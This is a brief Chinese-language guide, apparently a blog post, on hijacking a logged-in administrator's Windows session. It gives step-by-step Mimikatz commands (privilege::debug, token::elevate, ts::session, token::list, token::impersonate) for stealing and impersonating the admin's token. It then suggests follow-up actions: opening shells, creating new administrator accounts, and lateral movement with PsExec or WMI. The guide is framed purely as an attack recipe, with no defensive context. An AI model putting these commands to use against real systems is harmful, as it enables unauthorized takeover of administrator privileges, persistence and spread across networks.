桌面有管理员会话，怎么做会话劫持

步骤一：获取 SYSTEM 权限

要窃取管理员的令牌，你首先需要获得比该管理员会话更高的权限，通常是 SYSTEM 权限

• 方法一： 如果你当前是以管理员权限运行的，可以尝试直接使用 Mimikatz 的 token::elevate 命令，它会尝试提升到 SYSTEM 权限
• 方法二： 如果当前权限较低，可以通过提权漏洞（如服务权限配置错误、内核漏洞等）来提升到 SYSTEM 权限

步骤二：识别目标进程

你需要找到一个由管理员账户启动的进程，该进程的令牌是你想要窃取的。通常，你可以通过 tasklist /v 命令来查看所有进程及其所属的用户

• 常用目标进程：
  • explorer.exe：这是桌面进程，通常由当前登录的用户启动
  • winlogon.exe：这是一个关键的系统进程，与用户会话和登录相关
  • 其他由管理员账户启动的应用程序

步骤三：窃取并冒用令牌

一旦你有了 SYSTEM 权限，就可以使用 Mimikatz 来窃取令牌

• 命令：
  1. mimikatz.exe
  2. privilege::debug
  3. token::elevate
  4. whoami （此时你应该看到你是 NT AUTHORITY\SYSTEM）
  5. ts::session （列出所有会话，找到管理员的会话 ID）
  6. ts::s + <会话ID> （切换到管理员的会话）
  7. token::list （列出当前会话的所有令牌，找到管理员的令牌）
  8. token::impersonate /p:<进程ID> （冒充管理员会话的某个进程的令牌）
  9. whoami （此时你应该看到你已经是管理员用户了）

步骤四：执行命令

当你成功冒充管理员身份后，你就可以执行任何管理员权限的命令，例如：

• shell powershell
• shell cmd.exe
• 创建新的管理员账户
• 执行横向渗透命令（如 PsExec、WMI）

版权所有

许可证：署名 4.0 国际 (CC-BY-4.0)